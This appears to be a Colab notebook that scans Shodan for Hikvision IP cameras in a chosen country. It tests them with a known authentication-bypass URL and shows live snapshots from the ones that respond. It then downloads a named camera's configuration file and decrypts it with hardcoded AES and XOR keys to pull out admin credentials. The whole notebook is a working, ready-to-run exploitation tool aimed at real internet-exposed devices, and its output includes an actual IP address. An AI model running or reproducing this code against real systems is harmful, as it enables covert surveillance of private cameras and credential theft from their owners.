<a href="https://colab.research.google.com/github/saz-io/hkvision_backdoor_colab/blob/main/hkvision_backdoor.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

Hikvision IP Camera - Backdoor

### requirement

In [ ]:
!pip install pycryptodome
!pip install requests shodan
import getpass
import requests
import shodan
from itertools import cycle
from Crypto.Cipher import AES
import re
import os
import sys
import requests
from PIL import Image
from io import BytesIO
from IPython.display import display

### shodan api

In [ ]:
API_KEY = input("Enter your Shodan API key: ")

### Country code

In [ ]:
country_code = input("Enter the country code to search for: ")

### Finding vunerable camera

In [ ]:
dorks = ['''3.1.3.150324''', '''Server: App-webs/''', '''Content-Length: 1862''']
exploitable = []
list_of_links = []
exploit_check = "/Security/users?auth=YWRtaW46MTEK"
get_snapshot = "/onvif-http/snapshot?auth=YWRtaW46MTEK"

api = shodan.Shodan(API_KEY)

for dork in dorks:
    result = api.search(dork)
    country_results = [service for service in result['matches'] if service['location']['country_code'] == country_code]

    for service in country_results:
        ipx = service['ip_str']
        portx = service['port']
        if portx == "80":
            full = f"http://{ipx}"
            list_of_links.append(full)
        elif portx == "443":
            full = f"https://{ipx}"
            list_of_links.append(full)
        else:
            full = f"http://{ipx}:{portx}"
            list_of_links.append(full)

    for link in list_of_links:
        try:
            x = requests.get(f'{link}{exploit_check}', timeout=3)
            if x.status_code == 200:
                exploitable.append(f'{link}{get_snapshot}')
        except Exception:
            pass

for xddd in exploitable:
    print(xddd)



### snapshots from the camera

In [ ]:
def display_resized_image_from_url(url, size=(200, 200)):
    response = requests.get(url)
    try:
        img = Image.open(BytesIO(response.content))
        img.thumbnail(size)
        display(img)
    except Exception as e:
        print(f"Error displaying image from URL: {url}")
        print(f"Error message: {str(e)}")

for url in exploitable:
    print(url)
    display_resized_image_from_url(url)

In [ ]:
camera_ip = input("Enter the IP address of the camera: ")

Enter the IP address of the camera: 50.35.78.213:80


### getting the config file of the camera

In [ ]:
url = f"http://{camera_ip}/System/configurationFile?auth=YWRtaW46MTEK"
config_folder = 'config'

if not os.path.exists(config_folder):
    os.makedirs(config_folder)

ip_address = re.search(r'\d+\.\d+\.\d+\.\d+', camera_ip).group(0)
file_name = os.path.join(config_folder, f"config_{ip_address}")
os.system(f"wget -O {file_name} {url}")
print(f"Configuration file downloaded and saved as {file_name} 'COPY THE PATH FOR THE NEXT ")

Configuration file downloaded and saved as 'config/config_50.35.78.213 'COPY THE PATH FOR THE NEXT 


### decrypting the config file

In [ ]:
def add_to_16(s):
    while len(s) % 16 != 0:
        s += b'\0'
    return s

def decrypt(ciphertext, hex_key='279977f62f6cfd2d91cd75b889ce0c9a'):
    key = bytes.fromhex(hex_key)
    ciphertext = add_to_16(ciphertext)
    cipher = AES.new(key, AES.MODE_ECB)
    plaintext = cipher.decrypt(ciphertext[AES.block_size:])
    return plaintext.rstrip(b"\0")

def xore(data, key=bytearray([0x73, 0x8B, 0x55, 0x44])):
    return bytes(a ^ b for a, b in zip(data, cycle(key)))

def strings(file):
    chars = r"A-Za-z0-9/\-:.,_$%'()[\]<> "
    shortestReturnChar = 2
    regExp = '[%s]{%d,}' % (chars, shortestReturnChar)
    pattern = re.compile(regExp)
    return pattern.findall(file)

def find_words_after_admin(words_list):
    words_after_admin = []
    found_admin = False
    for word in words_list:
        if found_admin:
            words_after_admin.append(word)
            found_admin = False
        if word.lower() == 'admin':
            found_admin = True
    return words_after_admin

def main(config_file):
    if not os.path.isfile(config_file):
        return print(f'No valid config file provided to decrypt: {config_file}')
    with open(config_file, 'rb') as f:
        xor = xore(decrypt(f.read()))
        result_list = strings(xor.decode('ISO-8859-1'))
        print("Original list of words:")
        print(result_list)
        words_after_admin = find_words_after_admin(result_list)
        print("\nWords after 'admin':")
        print(words_after_admin)

if __name__ == '__main__':
    config_file = input("Enter the path to the config file: ")
    main(config_file)